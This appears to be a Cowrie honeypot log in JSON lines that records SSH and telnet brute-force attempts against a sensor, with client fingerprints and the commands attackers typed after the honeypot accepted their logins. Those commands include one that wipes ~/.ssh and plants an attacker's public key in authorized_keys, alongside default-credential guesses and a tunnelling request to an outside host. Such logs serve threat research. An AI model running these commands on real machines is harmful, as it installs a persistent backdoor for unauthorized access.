{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:52.804993Z","src_ip":"212.227.125.160","session":"99b8a0b46504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53133,"dst_ip":"1.2.3.4","dst_port":23,"session":"393104ee6ee1","protocol":"telnet","message":"New connection: 212.227.235.229:53133 (1.2.3.4:23) [session: 393104ee6ee1]","sensor":"my-vps","timestamp":"2025-08-31T01:05:53.926846Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:53.959316Z","src_ip":"212.227.125.160","session":"99b8a0b46504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43620,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a90433cf03e","protocol":"ssh","message":"New connection: 212.227.125.160:43620 (1.2.3.4:22) [session: 5a90433cf03e]","sensor":"my-vps","timestamp":"2025-08-31T01:06:02.872868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:02.888858Z","src_ip":"212.227.125.160","session":"5a90433cf03e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:02.947161Z","src_ip":"212.227.125.160","session":"5a90433cf03e"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:03.352218Z","src_ip":"212.227.125.160","session":"5a90433cf03e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34056,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca40d88d6987","protocol":"ssh","message":"New connection: 212.227.235.229:34056 (1.2.3.4:22) [session: ca40d88d6987]","sensor":"my-vps","timestamp":"2025-08-31T01:06:04.166409Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:04.477329Z","src_ip":"212.227.125.160","session":"5a90433cf03e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:04.984482Z","src_ip":"212.227.235.229","session":"ca40d88d6987"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:06:04.985391Z","src_ip":"212.227.235.229","session":"ca40d88d6987"}
{"eventid":"cowrie.login.failed","username":"debian","password":"letmein","message":"login attempt [debian/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:11.199647Z","src_ip":"212.227.235.229","session":"ca40d88d6987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56606,"dst_ip":"1.2.3.4","dst_port":22,"session":"42f543142716","protocol":"ssh","message":"New connection: 212.227.125.160:56606 (1.2.3.4:22) [session: 42f543142716]","sensor":"my-vps","timestamp":"2025-08-31T01:06:13.072007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:13.113612Z","src_ip":"212.227.125.160","session":"42f543142716"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:13.145845Z","src_ip":"212.227.125.160","session":"42f543142716"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:13.509026Z","src_ip":"212.227.125.160","session":"42f543142716"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:13.592850Z","src_ip":"212.227.235.229","session":"ca40d88d6987"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:14.640714Z","src_ip":"212.227.125.160","session":"42f543142716"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57122,"dst_ip":"1.2.3.4","dst_port":22,"session":"5152215451d1","protocol":"ssh","message":"New connection: 212.227.235.229:57122 (1.2.3.4:22) [session: 5152215451d1]","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.333826Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.334927Z","src_ip":"212.227.235.229","session":"5152215451d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57525,"dst_ip":"1.2.3.4","dst_port":22,"session":"c77258812339","protocol":"ssh","message":"New connection: 212.227.235.229:57525 (1.2.3.4:22) [session: c77258812339]","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.442936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.444336Z","src_ip":"212.227.235.229","session":"c77258812339"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.579365Z","src_ip":"212.227.235.229","session":"c77258812339"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:06:18.986217Z","src_ip":"212.227.235.229","session":"c77258812339"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T01:06:19.122482Z","session":"c77258812339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52690,"dst_ip":"1.2.3.4","dst_port":22,"session":"d72e4a64aff8","protocol":"ssh","message":"New connection: 212.227.125.160:52690 (1.2.3.4:22) [session: d72e4a64aff8]","sensor":"my-vps","timestamp":"2025-08-31T01:06:23.082811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:23.085326Z","src_ip":"212.227.125.160","session":"d72e4a64aff8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:23.156761Z","src_ip":"212.227.125.160","session":"d72e4a64aff8"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:23.779010Z","src_ip":"212.227.125.160","session":"d72e4a64aff8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:24.853924Z","src_ip":"212.227.125.160","session":"d72e4a64aff8"}
{"eventid":"cowrie.session.closed","duration":30.969574451446533,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:24.896346Z","src_ip":"212.227.235.229","session":"393104ee6ee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37552,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b16160ec32f","protocol":"ssh","message":"New connection: 212.227.235.229:37552 (1.2.3.4:22) [session: 0b16160ec32f]","sensor":"my-vps","timestamp":"2025-08-31T01:06:25.510936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:25.511945Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:25.751116Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53300,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6bb1073d531","protocol":"ssh","message":"New connection: 212.227.125.160:53300 (1.2.3.4:22) [session: e6bb1073d531]","sensor":"my-vps","timestamp":"2025-08-31T01:06:26.596876Z"}
{"eventid":"cowrie.login.success","username":"root","password":"andy123","message":"login attempt [root/andy123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:06:26.744262Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36912,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1af878e7772","protocol":"ssh","message":"New connection: 212.227.235.229:36912 (1.2.3.4:22) [session: c1af878e7772]","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.189871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.190777Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:06:27.247418Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.248105Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.249714Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.256757Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.497353Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.login.success","username":"root","password":"database","message":"login attempt [root/database] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.564658Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:06:27.716715Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.717392Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.718416Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.784758Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.827644Z","src_ip":"212.227.125.160","session":"e6bb1073d531"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:06:27.828299Z","src_ip":"212.227.125.160","session":"e6bb1073d531"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:06:28.388173Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.388837Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:06:28.412690Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
